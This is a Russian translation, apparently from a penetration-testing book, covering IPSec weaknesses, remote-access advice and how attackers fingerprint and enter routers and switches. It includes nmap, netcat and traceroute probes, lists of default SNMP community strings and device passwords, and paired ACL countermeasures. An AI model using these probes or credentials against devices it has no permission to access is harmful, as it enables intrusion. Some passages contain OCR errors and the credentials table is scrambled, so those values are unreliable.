    После покорения протокола РРТР Брюс Шнеер и его коллега Нельс Фергюссон (Niels Ferguson) из Counterpane Internet Security сконцентрировали свое внимание на протоколе IPSec и описали результаты своего анализа в специальной статье. Основной лейтмотив статьи Брюс Шнеера и Нельса Фергюссона сводится к тому, что и сам протокол IPSec, и соответствующие документы, описывающие его стандарт, потрясающе сложны. Это мнение человека, разработавшего алгоритм шифрования, претендующий на утверждение в качестве государственного стандарта США — AES (Advanced Encryption Algorithm).
    В течение нескольких лет утверждения этих документов никто не опроверг. И хотя мы не советуем знакомиться с этой статьей читателям, которым неизвестен протокол IPSec, осведомленные специалисты получат от нее удовольствие. Вот несколько классических "перлов" и "бесценных" рекомендаций из этой статьи.

    •  "Протоколы шифрования не должны разрабатываться группами специалистов."
    •  "Сложность — главный враг безопасности."
    •  "Единственный надежный способ проверки безопасности системы — ее тестирование." (Главный лейтмотив этой книги.)
    •  "Избегайте режима транспортировки и использования протокола АН, используйте инкапсуляцию на базе протокола ESP."

    Брюс Шнеер и Нельс Фергюссон завершают свою статью признанием полной капитуляции: "По нашему мнению, протокол IPSec слишком сложен, чтобы быть безопасным. Однако на сегодняшний день лучшего средства защиты не существует." Конечно же, пользователи протокола IPSec должны полагаться на авторов конкретной реализации этого стандарта. Каждой конкретной реализации могут быть присущи свои собственные достоинства и недостатки, которые не останутся незамеченными сообществом хакеров.

    Точка зрения Стивена М. Белловина (Steven M. Bellovin)



    Наблюдая за дискуссиями типа Cryptographic Challenges  или изучая процедуры взлома RC5-64 , большинство читателей не отдают себе отчет в том, что обычно речь идет о получении взломщиками фрагментов незашифрованного текста. Однако захват передаваемой зашифрованной информации существенно отличается от взлома статических файлов паролей, поскольку поток зашифрованных данных не имеет четких границ, а значит, очень сложно определить начало и конец сеанса связи. Хакеру приходится угадывать, успешно расшифровывая и сопоставляя различные фрагменты разговора, не будучи при этом точно уверенным в правильном выборе исходной точки. Признанный титан мысли в области безопасности Internet, Стивен М. Белловин (Steven М. Bellovin) из лаборатории AT&T Labs Research опубликовал статью под названием Криптоанализ обычного текста с помощью протоколов IPSec ("Probable Plaintext Cryptanalysis of the IP Security Protocols"), в которой отмечает наличие известных фрагментов обычного текста в трафике IPSec — поля данных заголовка TCP/IP. И хотя это еще не свидетельствует о бреши в протоколе IPSec, этот факт дает пищу для размышления специалистам по взлому зашифрованных коммуникаций. 


    4. Резюме



    Резюме


    Теперь многие читатели могут подвергнуть сомнению надежность общей концепции систем удаленного доступа, основанных как на технологии виртуальных частных сетей, так и на использовании старых добрых телефонных линий. И это правильно. Расширение пределов организаций до размеров тысяч (или миллионов) по определению надежных конечных пользователей — чрезвычайно рискованное дело, и авторы это доказали. Они предлагают исходить из предположения о том, что удаленные пользователи работают в наихудших с точки зрения безопасности условиях (обычно это достаточно близко к действительности). Вот некоторые советы по обеспечению безопасности удаленного доступа.

    •  Политика назначения паролей, оправдывающая зарплату администратора по вопросам безопасности, приобретает еще более важное значение, если речь идет о выделении паролей для удаленного доступа к внутренним сетям. Удаленные пользователи должны использовать сложные пароли, надежность которых необходимо периодически контролировать. Рассмотрите возможность реализации механизма двухуровневой аутентификации на основе интеллектуальных плат или аппаратных ключей. Выясните у производителей, совместимы ли предлагаемые ими продукты с текущей инфраструктурой системы удаленного доступа. Многие компании предлагают простые надстройки, позволяющие легко реализовать схему аутентификации на основе аппаратных ключей для популярных серверов удаленного доступа типа Shiva LANRover. Таким образом, достичь требуемого уровня безопасности станет значительно легче.
    •  Обеспечивая безопасное соединение с Internet, не упускайте из виду обычные удаленные соединения. Разработайте политику контроля удаленных соединений внутри организации и регулярно проверяйте соблюдение принятых норм с использованием программ автопрозвона.
    •  Найдите и запретите несанкционированное использование программного обеспечения удаленного доступа во всей организации (более подробная информация об этом содержится в главе 13).
    •  Помните, что через телефонные линии хакеры могут получить доступ не только к модемам организации. Под их "обстрелом" могут оказаться офисные телефонные станции, факс-серверы, системы голосовой почты.
    •  Научите обслуживающий персонал и конечных пользователей предельно внимательному обращению с информацией об учетных записях для удаленного доступа, чтобы предотвратить возможность угрозы утечки информации через каналы социальной инженерии. Используйте дополнительные формы идентификации для получения информации по вопросам удаленного доступа через доску объявлений, например, введите систему персональных номеров.
    •  При всех своих достоинствах виртуальные частные сети могут подвергаться таким же атакам, как и другие "защищенные" технологии. Не верьте на слово уверениям разработчиков по поводу абсолютной защищенности VPN (вспомните статью Шнеера и Маджа, посвященную протоколу РРТР), разработайте строгую политику их использования и периодически контролируйте ее выполнение как и для удаленных соединений через обычные телефонные линии.


    Глава 10. Сетевые устройства



    Глава 10. СЕТЕВЫЕ УСТРОЙСТВА




    1. Сетевые устройства



    Сетевые устройства



    Компьютерная сеть — это кровеносная система любой компании. Сотни тысяч километров медных и оптоволоконных кабелей опоясывают стены корпоративной Америки, действуя подобно сосудам, доставляющим обогащенную кислородом кровь к мозгу. Однако во всем есть и другая сторона: типичную корпоративную локальную или глобальную сеть (LAN или WAN соответственно) трудно назвать безопасной. С учетом постоянно растущего значения компьютерных сетей сегодня нельзя пренебрежительно относится к этой проблеме, так как удачное проникновение злоумышленника в вашу сеть подчас может оказаться губительным для самого существования компании. В большинстве случаев овладение сетью означает то же самое, что и возможность перехвата почтовых сообщений, финансовых данных, перенаправление потока информации на неавторизованные системы. И все это возможно даже несмотря на применение частных виртуальных сетей (VPN — Virtual Private Network).
    Администратор сети должен понимать, что угроза утечки информации может исходить из любого источника, начиная с архитектурных недостатков и возможности SNMP-сканирования и заканчивая наличием используемых по умолчанию учетных записей, позволяющих кому угодно получить доступ к сетевым устройствам, или "потайных ходов" в базе данных MIB. В этой главе мы обсудим, как злоумышленники могут установить факт присутствия в сети сетевых устройств, выполнить их идентификацию, а затем взломать их и получить несанкционированный доступ.
    Наибольшую опасность для безопасности системы составляют человеческие ошибки. Необходимо помнить, что любое устройство, такое как совместно используемый концентратор, коммутатор или маршрутизатор, может быть либо неправильно настроено, либо даже неправильно спроектировано, обеспечивая тем самым скрытый потайной ход к вашим корпоративным сокровищам. Поэтому необходимо позаботиться о выявлении всех таких устройств и позаботиться о блокировании любых несущих угрозу изъянов, пока до них не добрались злоумышленники.


    2. Исследование



    Исследование


    Процесс обнаружения сетевого устройства не имеет принципиальных различий с описанными в данной книге методами обнаружения любых других компьютерных систем. Скорее всего взломщик начнет со сканирования портов, пытаясь найти какие-то "зацепки". Обнаружив открытые порты, он выполнит сбор маркеров и инвентаризацию сетевых ресурсов с помощью утилиты netcat. Если открыт порт UDP 161, скорее всего тут же последует попытка использования протокола SNMP (Simple Network Management Protocol), поскольку неправильно настроенные SNМР-устройства очень часто "выбалтывают" самую сокровенную информацию о своей конфигурации любому, кто ею заинтересуется.


    3. Обнаружение



    Обнаружение



    На этом этапе применяется сканирование портов с использованием разнообразных инструментов, о которых мы уже довольно подробно говорили в предыдущих главах. В большинстве случаев для выполнения всех работ будет вполне достаточно таких утилит, как traceroute, netcat и nmap.

    Прослеживание маршрута с помощью traceroute



    С помощью утилит traceroute или tracert, входящих в комплект поставки UNIX и NT, соответственно, можно определить основные маршруты, по которым проходят пакеты от вашего узла к другому узлу Internet или внутренней сети TCP/IP. Обладая этой информацией, можно обнаружить очень важный элемент сетевой инфраструктуры — маршрутизатор. Именно маршрутизатор чаше всего становится "мишенью № 1" в попытках злоумышленника обследовать структуру сети. Ниже приведен пример работы утилиты traceroute, из которого видно, как пакеты проходят от одного маршрутизатора (или брандмауэра) к другому.

    [sm@tsunami sm]$ traceroute www.destination.com
    traceroute to www.destination.com (192.168.21.3),30 hops max,40 byte packets
    1 happy (172.29.10.23) 6.809 ms 6.356 ms 6.334 ms
    2 rtrl.internal.net (172.30.20.3) 36.488 ms 37.428 ms 34.300 ms
    3 rtr2.internal.net (172.30.21.3) 38.720 ms 38.037 ms 35.077 ms
    4 core.externalp.net (10.134.13.1) 49.188 ms 54.787 ms 72.094 ms
    5 nj.externalp.net (10.134.14.2) 54.420 ms 64.554 ms 52.191 ms
    6 sfo.externalp.net (10.133.10.2) 54.726 ms 57.647 ms 53.813 ms
    7 lax-rtr.destination.com (192.168.0.1) 55.727 ms 57.039 ms 57.795 ms
    8 www.destination.com (192.168.21.3) 56.182 ms 78.542 ms 64.155 ms

    Зная, что перед представляющим интерес узлом находится узел 192.168.0.1, можно предположить, что он представляет собой не что иное, как маршрутизатор, управляющий распределением пакетов по узлам сети. Именно поэтому на это устройство (равно как и на другие, попавшие в выявленный маршрут прохождения пакетов), злоумышленник обратит внимание в первую очередь. (Строго говоря, скорее всего, что объектом его внимания станет вся подсеть, в которую входит данное устройство.) Однако знание IP-адреса маршрутизатора не влечет за собой автоматического получения сведений об изъянах в его архитектуре и настройке. Для того чтобы получить такие сведения, необходимо прибегнуть к сканированию портов, определению операционной системы, а также сбору любой дополнительной информации, которая может дать ключ к взлому системы зашиты устройства.

    Контрмеры: защита от прослеживания маршрута



    Для того чтобы запретить маршрутизатору Cisco отвечать на запросы со значением TTL больше допустимого, воспользуйтесь следующей командой.
    access-list 101 deny icmp any any 11 0
    Если же вы хотите разрешить прохождение ICMP-запросов, поступающих лишь с определенных доверенных сетей, и запретить маршрутизатору отвечать на запросы, отправляемые из других сетей, воспользуйтесь следующими командами.

    access-list 101 permit icmp any 172.29.20.0 0.255.255.255 11 0
    access-list 101 deny ip any any log

    Сканирование портов



    С помощью утилиты nmар, к которой мы очень часто прибегаем в подобных ситуациях, из операционной системы Linux можно выяснить, какие порты маршрутизатора (192.168.0.1) находятся в состоянии ожидания запросов. По комбинации обнаруженных портов часто можно судить о типе маршрутизатора. В табл. 10.1 перечислены стандартные порты TCP и UDP, используемые на самых популярных сетевых устройствах.  Для того чтобы идентифицировать тип устройств, можно прибегнуть к сканированию портов, а затем проанализировать полученные результаты. Не забывайте о том, что в различных реализациях комбинации портов могут отличаться от приведенных.

    Таблица 10.1. Стандартные TCP- и UDP-порты некоторых сетевых устройств

    Устройство
    TCP
    UDP
    Маршрутизаторы Cisco
    21 (ftp) 
    23 (telnet) 
    79 (finger) 
    80 (http) 
    512 (exec) 
    513 (login) 
    514 (shell) 
    1993 (Cisco SNMP) 
    1999 (Cisco ident) 
    2001 
    4001 
    6001 9001 (XRemoute)
    0 (tcpmux) 
    49 (domain) 
    67 (bootps) 
    69 (tftp) 
    123(ntp) 
    161 (snmp)
    Коммутаторы Cisco
    23 (telnet) 
    7161
    0 (tcpmux) 
    123(ntp) 
    161 (snmp)
    Маршрутизаторы Bay
    21 (ftp) 
    23 (telnet)
    7 (echo) 
    9 (discard) 
    67 (bootps) 
    68 (bootpc) 
    69 (tftp) 
    161 (snmp) 
    520 (route)
    Маршрутизаторы Ascend
    23 (telnet)
    7 (echo) 
    9 (discard)
    161 (snmp) 
    162 (snmp-trap) 
    514 (shell) 
    520 (route)

    Так, если вас интересуют маршрутизаторы Cisco, выполните сканирование портов 1-25, 80, 512-515, 2001, 4001, 6001 и 9001. Полученные при этом результаты помогут определить изготовителя устройства и его тип.

    [/tmp]# nmap -pl-25,80,512-515,2001,4001,6001,9001 192.168.0.1
    Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com,
    www.insecure.org/nmap/)
    Interesting ports on (192.168.0.1):
    Port State Protocol Service
    7 open tcp echo
    9 open tcp discard
    13 open tcp daytime
    19 open tcp chargen
    23 filtered tcp telnet
    2001 open tcp dc
    6001 open tcp Xll:l

    С помощью еще одного из наших любимых средств, утилиты SuperScan Робина Кейра (Robin Keir), сканирование можно выполнить из системы NT и найти все открытые порты маршрутизатора. Эта программа позволяет задать список портов, который впоследствии можно применять при каждой операции сканирования (рис. 10.1).



    Рис. 10.1. Утилита SuperScan позволяет задать множество портов, благодаря чему значительно облегчается их последующее сканирование

    После выбора требуемого перечня портов можно приступать к сканированию сети (172 .16. 255. 0) на предмет поиска устройств Cisco.


    Полученная картина использования портов подталкивает к мысли о том. что в данном случае мы имеем дело с маршрутизатором Cisco. Конечно, пока этого нельзя сказать со всей определенностью, поскольку мы еще не установили тип используемой операционной системы. Для того чтобы подтвердить или опровергнуть наши предположения, необходимо провести предварительный сбор информации TCP, которую мы подробно рассматривали в главе 2.
    Характерной особенностью большинства маршрутизаторов Cisco является также наличие приглашения User Access Verification при подключении к портам vty (23 и 2001). Попробуйте связаться с данными портами устройства с помощью утилиты telnet и, если это действительно маршрутизатор Cisco, вы увидите следующее приглашение.

    User Access Verification 
    Password:

    Идентификация операционной системы
    В предыдущем примере для того чтобы удостовериться в том, что мы не ошиблись, идентифицировав узел 192.168 . 0.1 как маршрутизатор Cisco, можно прибегнуть к утилите птаар и использовать ее для определения типа операционной системы (ОС). Поскольку порт TCP 13 открыт, мы можем просканировать узел с помощью утилиты nmap, укатав параметр -О, и установить, под управлением какой операционной системы работает узел. В данном случае, как видно в приведенном ниже листинге, эта система — Cisco IOS 11.2.

    [root@source /tmp]# nmap -О -р!3 -n 192.168.0.1
    Starting nmap V. 2.12 by Fyodor {fyodor@dhp.com,
    www.insecure.org/nmap/)
    Warning: No ports found open on this machine, OS detection will be
    MUCH less reliable
    Interesting ports on (172.29.11.254):
    Port State Protocol Service
    13 filtered tcp daytime
    Remote operating system guess: Cisco Router/Switch with IDS 11.2

    Всегда, когда это возможно, для идентификации типа операционной системы сканируйте только один порт. Многие операционные системы, в том числе IOS компании Cisco и Solaris компании Sun, известны тем, что в качестве ответа возвращают отправителю пакеты, не соответствующие стандартам RFC, что может привести к зависанию отдельных систем. Для получения более подробной информации об исследовании стека читайте главу 2, "Сканирование".

    Контрмеры: защита от идентификации типа ОС



    Методы обнаружения и предупреждения попыток сканирования с целью идентификации типа операционной системы подробно описаны в главе 2.

    Утечка информации в пакетах Cisco





    Рис. 10.2. Подобный изъян имеется во всех моделях маршрутизаторов Cisco, что значительно облегчает их идентификацию

    Информация об этом изъяне системы зашиты Cisco впервые была опубликована в бюллетене Bugtraq Джоелом (JoeJ) из группы Rhino9. Он заключается в том, каким образом устройства Cisco отвечают на TCP-запросы SYN, передаваемые через порт 1999 (порт, используемый службой ident Cisco). Неофициальный ответ компании Cisco на эту проблему был опубликован в бюллетене Bugtraq Джоном Башински (John Bashinski) <jbash@cc.COM>.
    Метод получения информации тривиален. Для того чтобы определить, является ли то или иное устройство маршрутизатором Cisco, просто просканируйте TCP-порт с номером 1999. С применением утилиты nmap эта задача решается следующим образом.
    [root@source /tmp]# nmap -nvv -p1999 172.29.11.254
    После этого с помощью специального программного обеспечения нужно перехватить ответный пакет RST/ASK. Как видно из рис. 10.2, среди данных этого пакета можно обнаружить слово cisco.

    Контрмеры: защита маршрутизаторов Cisco от утечки информации



    Самый простой способ защиты от утечки информации заключается в том, чтобы использовать команду, запрещающую поступление пакетов TCP через порт 1999. Она может иметь следующую форму.

    access-list 101 deny tcp any any eq 1999 log!
    Блокирование сканирования устройств Cisco

    Инвентаризация и сбор маркеров Cisco



    Если по всем признакам устройство ведет себя как устройство Cisco, то, скорее всего, так оно и есть. Однако в некоторых случаях данное утверждение все же оказывается ложным — лишь обнаружения ожидаемых открытых портов недостаточно, чтобы быть уверенным в том, что вы имеете дело именно с Cisco. Однако можно воспользоваться некоторыми дополнительными проверками, характерными именно для этой платформы.

    Служба finger и порты виртуальных терминалов 2001, 4001, 6001



    На некоторые запросы служба finger компании Cisco может выдавать совершенно бесполезную (для пользователя или администратора, но не для злоумышленника) информацию. Виртуальные терминалы vty Cisco (обычно с номером 5) отвечают на простой запрос finger -1 @<узел>, но в выдаваемых результатах нет ничего информативного, за исключением лишь того, что по самому факту получения ответа можно судить о том, что мы имеем дело с маршрутизатором Cisco.
    Еще одним методом получения информации является обращение к портам 2001, 4001 и 6001, которые в маршрутизаторах Cisco предназначены для управления устройством. С помощью утилиты netcat взломщик может подключиться к любому из этих портов и проверить, будет ли получена какая-либо информация от узла. В большинстве случаев полученную тарабарщину трудно назвать информацией, однако если подключиться к этим портам с помощью броузера, указав, например, адрес вида 172.29.11.254:4001, то результат может выглядеть следующим образом.

    User Access Verification Password: Password: Password: % Bad passwords

    Такое сообщение поможет злоумышленнику удостовериться в том, что он имеет дело с устройством Cisco.

    Служба XRemote Cisco (9001)



    Еще одним часто используемым портом Cisco является TCP-порт службы XRemote с номером 9001. Эта служба позволяет узлам вашей сети подключаться с помощью клиента XSession к маршрутизатору (обычно через модем). Когда злоумышленник подключается к этому порту с помощью утилиты netcat, то устройство, как правило, передает обратно идентификационный маркер, как показано в следующем примере.

    C:\>nc-nvv 172.29.11.254 9001
    (UNKNOWN) [172.29.11.254] 9001 (?) open
    -— Outbound XRemote service —-
    Enter X server name or IP address:

    Контрмеры: защита от сбора информации об устройствах Cisco



    Единственный метод, позволяющий предотвратить инвентаризацию устройств Cisco. заключается в ограничении доступа с помощью списка ACL. Можно либо использовать установленное по умолчанию правило "очистки", либо в явной форме запретить подключение к соответствующим портам, чтобы все подобные попытки регистрировались в контрольном журнале. Для этого можно воспользоваться командами следующего вида.
    access-list 101 deny tcp any any 79 log
    или
    access-list 101 deny tcp any any 9001


    1.gif

    Изображение: 

    2.gif

    Изображение: 

    3.gif

    Изображение: 

    4. SNMP



    SNMP


    Протокол SNMP (Simple Network Management Protocol) предназначен для облегчения работы администратора по управлению устройствами сети. Однако огромной проблемой протокола SNMP версии 1 (SNMPvl) всегда была абсолютная незащищенность узла, на котором работали средства поддержки этого протокола. В исходной версии использовался только один механизм обеспечения безопасности, основанный на использовании специачьных паролей, называемых строками доступа (community string). В ответ на жалобы о наличии слабых мест в системе обеспечения безопасности была быстро разработана значительно улучшенная версия SNMP (SNMFV2). В этой версии для аутентификации сообщений, передаваемых между серверами и клиентами SNMP, используется алгоритм хэширования MD5. Это позволяет обеспечить как целостность пересылаемых данных, так и возможность проверки их подлинности. Кроме того, SNMPv2 допускает шифрование передаваемых данных. Это ограничивает возможности злоумышленников по прослушиванию трафика сети и получению строк доступа. Однако в то же время ничто не мешает администраторам использовать на маршрутизаторах простейшие пароли.
    Третья версия протокола SNMP (SNMPv3)  является текущим стандартом и позволяет достичь необходимого уровня безопасности устройств, но его принятие, по-видимому, затянется на довольно длительное время. Достаточно изучить типичную сеть, чтобы убедиться в том, что большинство устройств работает под управлением даже не SNMPv2, a SNMPvl! Более подробная информация о протоколе SNMPv3 находится по адресу http://www.ietf.org/ html.charters/snmpv3-charter.html. Однако ни одна из версий протокола SNMP не ограничивает возможности использования администраторами строк доступа, предлагаемых разработчиками. Как правило, для них устанавливаются легко угадываемые пароли, которые хорошо известны всем, кто хоть немного интересуется подобными вопросами.
    Еще хуже то, что во многих организациях протокол SNMP практически не учитывается в реализуемой политике безопасности. Возможно, это происходит из-за того, что протокол SNMP работает поверх UDP (который, как правило, отсутствует в стеке протоколов), или потому, что о его возможностях известно лишь немногим администраторам. В любом случае необходимо констатировать, что вопросы обеспечения безопасности при использовании протокола SNMP часто ускользают из поля зрения, что нередко дает возможность взломщикам проникнуть в сеть.
    Однако перед тем, как перейти к подробному рассмотрению изъянов протокола SNMP, давайте кратко познакомимся с основными понятиями, которые с ним связаны. Строки доступа могут быть одного из двух типов — позволяющие только чтение (тип read) и позволяющие как чтение, так и запись (read/write). При использовании строк доступа SNMP, позволяющих только чтение, можно лишь просматривать сведения о конфигурации устройства, такие как описание системы, TCP- и UDP-соединения, сетевые адаптеры и т.д. Строки доступа, предоставляющие права чтения и записи, обеспечивают администратору (и, конечно, злоумышленнику) возможность записывать информацию в устройство. Например, с использованием всего одной команды SNMP администратор может изменить контактную системную информацию, snmpset 10.12.45.2 private .1.3.6.1.2.1.1 s Smith

    Маршрутизаторы Ascend



    По умолчанию маршрутизаторы Ascend обеспечивают доступ по протоколу SNMP с помощью строк доступа public (для чтения — read) и writ: спя чтения и записи — read/write). Изъян в системе защиты, связанный с SNMP-доступом для чтения и записи, впервые был обнаружен специалистами из Network Associates. Inc.

    Контрмеры: защита маршрутизаторов Ascend



    Для того чтобы изменить установленные по умолчанию строки доступа на маршрутизаторе Ascend, просто воспользуйтесь командой меню Ethernet>ModConflg>SNMP Options.

    Маршрутизаторы Bay



    Маршрутизаторы компании Bay NT по умолчанию предоставляют доступ по протоколу SNMP, контролируемый на уровне пользователей как для чтения, так и для записи. Для того чтобы воспользоваться этой возможностью, достаточно попытаться использовать установленное по умолчанию пользовательское имя User без пароля. В командной строке маршрутизатора введите команду  show snmp comm types
    Эта команда позволяет просматривать имеющиеся строки доступа. То же самое с помощью диспетчера Site Manager может проделать любой пользователь (команда меню Protocols>IP>SNMP>Communities).

    Контрмеры: защита маршрутизаторов Bay



    В диспетчере Site Manager, который входит в состав программного обеспечения маршрутизаторов компании Bay Networks, выберите команду меню Protocols>IlP1* SNMPoCommunities. После этого выберите команду Community>Edit Community и измените строки доступа.

    Контрмеры: защита SNMP



    Если вы разрешаете осуществлять SNMP-доступ через пограничный брандмауэр к какому-либо одному устройству, а в использовании протокола SNMP для доступа к остальным узлам сети нет острой необходимости, то можно просто внести соответствующие ограничения в список ACL маршрутизатора.
    access-list 101 deny udp any any eq 161 log ! Блокирование трафика SNMP
    Еще проще заменить строки доступа трудно угадываемыми паролями. Например, в устройствах Cisco это достигается с помощью следующей простой команды.
    snmp-server community <трудно угадываемый пароль> RO
    Кроме того, всегда, когда это возможно, запрещайте SNMP-доступ для чтения с возможностью записи.
    Для снижения риска применения протокола SNMP можно воспользоваться также и рекомендацией самой компании Cisco (http://www.cisco.com/univercd/cc/-td/doc/cisintwk/ics/cs003.htm):
    "К сожалению, строки доступа SNMP передаются по сети в виде незашифрованного текста... По этой причине отказ от использования сервера SNMP, поддерживающего передачу сообщений trap, позволит предотвратить перехват этих сообщений взломщиками (передаваемых между диспетчерами и агентами SNMP) и их использование для получения строк доступа."

    Если в строке доступа вы хотите использовать символ ?, то перед ним необходимо нажать комбинацию клавиш <Ctrl-V>. Например, для того чтобы установить строку доступа, равную secret? 2me, введите secret<Ctrl-V>?2me.

    В табл. 10.2 перечислены все основные разработчики сетевых устройств и строки доступа, используемые ими по умолчанию для чтения и для чтения/записи.

    Таблица 10.2. Используемые по умолчанию пароли сетевых устройств

    Компания-разработчик
    Строка доступа для чтения
    Строка доступа для чтения/записи
    Ascend
    public
    write
    Bay
    public
    private
    Cisco
    public
    private
    3Com
    public, monitor
    manager, security
    Ниже приведен список часто встречаемых строк доступа.
    •  public
    •  private
    •  secret
    •  world
    •  read
    •  network
    •  community
    •  write
    •  cisco
    •  all private
    •  admin
    •  default
    •  password
    •  tivoli
    •  openview
    •  monitor
    •  manager
    •  security

    Помимо перечисленных строк доступа, используемых по умолчанию, многие компании в качестве таковых используют собственное название. Например, руководствуясь этим принципом, издательство Osborne может использовать в качестве строки доступа слово osborne (но это только по секрету).


    5. "Потайные" ходы



    "Потайные" ходы


    "Тайная" учетная запись (backdoor account) — это одна из наиболее сложных проблем. Такие учетные записи создаются разработчиками для того, чтобы при отладке обходить случайно заблокированные учетные записи администраторов, однако гораздо чаще они предоставляют злоумышленникам возможность проникновения в вашу систему. В последние годы было выявлено немало таких встроенных пользовательских имен и паролей, позволяющих получить доступ ко многим популярным сетевым устройствам, включая 3Com, Bay, Cisco и Shiva. Суть проблемы заключается в том, чтобы найти все подобные устройства и запретить или ограничить к ним доступ.


    6. Установленные по умолчанию учетные записи



    Установленные по умолчанию учетные записи


    Одним из чаще всего обнаруживаемых изъянов является установленные по умолчанию имя пользователя и пароль. Практически все разработчики поставляют на рынок сетевые устройства, позволяющие получить с помощью подобной учетной записи доступ на уровне пользователя, а иногда — и администратора (подробнее см. табл. 10.3). Поэтому вашим первым шагом при настройке таких устройств должно быть немедленное удаление таких учетных записей.

    Таблица 10.3. Стандартные пользовательские имена и пароли, которые необходимо изменить

    Устройство
    Имя
    Пароль
    Уровень
    Маршрутизатор Bay
    User Manager
    <нет> <нет>
    Пользователь Администратор
    Коммутатор Bay 350T Bay SuperStack II 3COM
    NetlCs Security
    admin
     read
     write 
    debug 
    tech
     monitor
     manager 
    security
    <нет> Security
    synnet 
    synnet
     synnet
     synnet
     tech 
    monitor
     manager 
    security
    Администратор Администратор
    Администратор Пользователь Администратор Администратор
    Пользователь Администратор Администратор
    Cisco
    (telnet)
      (telnet) 
    enable 
    (telnet)
    с (Cisco 2600)
    CISCO
    cisco 
    cisco routers
    Пользователь
     Пользователь
     Администратор
    Shiva
    Webramp Motorola CableRouter
    root 
    Guest
    wradmin 
    cablecom
    <нет>
     <нет>
    trancell
     router
    Администратор Пользователь
    Администратор
     Администратор

    Коммутаторы 3Com



    Коммутаторы 3Com очень часто имеют несколько встроенных по умолчанию учетных записей с разным уровнем привилегий — admin, read, write, debug, test и monitor. Если эти встроенные учетные записи окажутся незащищенными, то с их помощью злоумышленник сможет получить пользовательские или даже административные привилегии.

    Контрмеры: защита встроенных учетных записей коммутаторов 3Com



    Для того чтобы изменить пароль, введите с консоли устройства команду system password.

    Маршрутизаторы Bay



    Маршрутизаторы Bay имеют пару установленных по умолчанию учетных записей, некоторые из которых к тому же по умолчанию не защищены паролем. Поскольку при настройке операционной системы удобно пользоваться учетными записями User и Manager, в которых пароль отсутствует, то довольно часто администраторы оставляют эти учетные записи незащищенными. Это позволяет злоумышленнику с помощью утилиты telnet получить прямой доступ к устройству и через FTP переписать на свой компьютер конфигурационные файлы. Например, на многих коммутаторах Bay 350T имеется учетная запись NetiCs без пароля, которая представляет собой прекрасный "потайной ход" в систему. 

    Контрмеры: защита встроенных учетных записей маршрутизаторов Bay



    •  Установите пароли для учетных записей User и Manager.
    •  Отключите поддержку служб FTP и telnet.
    •  Добавьте список ACL, чтобы разрешить подключение с использованием FTP и telnet только строго определенным узлам.
    •  Ограничьте возможности учетной записи User, запретив использование протоколов FTP, TFTP и telnet.

    Пароли маршрутизаторов Cisco



    На разных моделях Cisco неоднократно обнаруживали различные пароли, используемые по умолчанию для доступа с виртуального терминала vty, включая такие легко угадываемые, как cisco и cisco routers. Кроме того, на некоторых моделях были обнаружены установленные по умолчанию пароли cisco, позволяющие получить удаленный доступ к устройству. Как вы понимаете, такие пароли нужно как можно быстрее заменить на более сложные. Наконец, на некоторых моделях Cisco 2600, произведенных до 24 апреля 1998 года, по умолчанию использовался пароль, состоящий из одной-единственной буквы с.

    Контрмеры: защита маршрутизаторов Cisco



    Даже если вы измените все обнаруженные легко угадываемые пароли, установленные производителем по умолчанию, это вовсе не означает, что ваше устройство Cisco надежно защищено. Поскольку компания Cisco не применяет мощных алгоритмов шифрования паролей, используемых для доступа с терминалов vty, то, обнаружив их тем или иным способом, злоумышленник сможет без труда взломать эти пароли. Несмотря на это, каждый владелец маршрутизатора Cisco должен как можно скорее выполнить следующие операции.

    •  Убедитесь в том, что установлена служба шифрования паролей (service password-encryption).
    •  Выполните команду enable password ") <пароль>, чтобы зашифровать пароль vty хотя бы с помощью слабого алгоритма шифрования Cisco (это все же лучше, чем передача пароля в виде незашифрованного текста).

    Устройства Webramp



    Джеймс Игелхоф (James Egelhof) и Джон Стенли (John Stanley) установили, что устройства Webramp Entre (в версии ISDN) имеют установленные по умолчанию пользовательское имя wradmin и пароль trancell. Эта учетная запись предоставляет злоумышленнику доступ к устройству на уровне администратора, позволяя вносить изменения в конфигурацию, изменять пароль и т.д. Вполне вероятно, что подобные недостатки имеются и в других продуктах Webramp. 

    Контрмеры: защита устройств Webramp



    В данном случае самый простой метод защиты заключается в изменении административного пароля. Более сложное решение, предложенное Игелхофом и Стенли, заключается в ограничении доступа с использованием службы telnet через порт WAN. Это можно осуществить несколькими способами, однако мы можем порекомендовать следующий. Находясь в среде программного обеспечения устройства Webramp включите режим Visible Computer для каждого активного модемного порта и направьте его на ложный IP-адрес, например, на немаршрутизируемый адрес, такой как 192.168.100.100. После этого отключите оба режима Divert Incoming.

    Подключение к кабельному модему Motorola через порт 1024 с помощью telnet



    Как сообщалось в майском выпуске (1998 г.) бюллетеня Bugtraq, программное обеспечение Cable Router компании Motorola позволяет кому угодно подключиться к скрытому порту telnet. Как выяснилось, с портом TCP 1024 связан ожидающий поступления запросов демон telnet, и, используя установленные по умолчанию пользовательское имя cablecom и пароль router, через эту службу можно получить административный доступ к этому устройству. Хотя на практике кабельные модемы от компании Motorola встречаются нечасто, авторы оставили описание этого изъяна, поскольку он наглядно демонстрирует возможность проникновения в систему через такие "неожиданные" порты, как TCP 1024. Не допускает ли ваш модем скрытый доступ через службу telnet к какому-либо другому порту?


    7. Устранение изъянов



    Устранение изъянов



    Возможность хакинга сетевых устройств в значительной степени зависит от объема и качества проведенных в сети защитных мероприятий. Если вы выбрали пароли для подключений telnet и строки доступа SNMP, которые трудно подобрать, ограничили использование служб FTP и TFTP, а также активизировали режим регистрации всех событий, имеющих отношение к безопасности (при условии, конечно, что кто-то регулярно просматривает эти журналы), то описанные ниже изъяны вряд ли окажутся опасными для вашей сети. С другой стороны, если ваша сеть достаточно обширна и имеет сложную для управления структуру, в ней могут оказаться узлы, безопасность которых, мягко говоря, далека от идеальной. В связи с этим нелишним будет выполнить дополнительную проверку и лишний раз застраховаться от неожиданностей.

    Устаревшая база данных MIB Cisco и Ascend



    Устройства компаний Cisco и Ascend поддерживают базу данных MIB устаревшего формата, которая через открытые строки доступа, обеспечивающие чтение и запись, позволяет любому пользователю получить конфигурационный файл с использованием TFTP. Если речь идет об устройствах Cisco, то эта база данных называется OLD-CISCO-SYS-MIB. Ввиду того что в этом файле содержится пароль для доступа к устройству Cisco (он зашифрован весьма примитивным способом — с помощью операции XOR), взломщик может легко расшифровать его и использовать для реконфигурации вашего маршрутизатора или коммутатора.
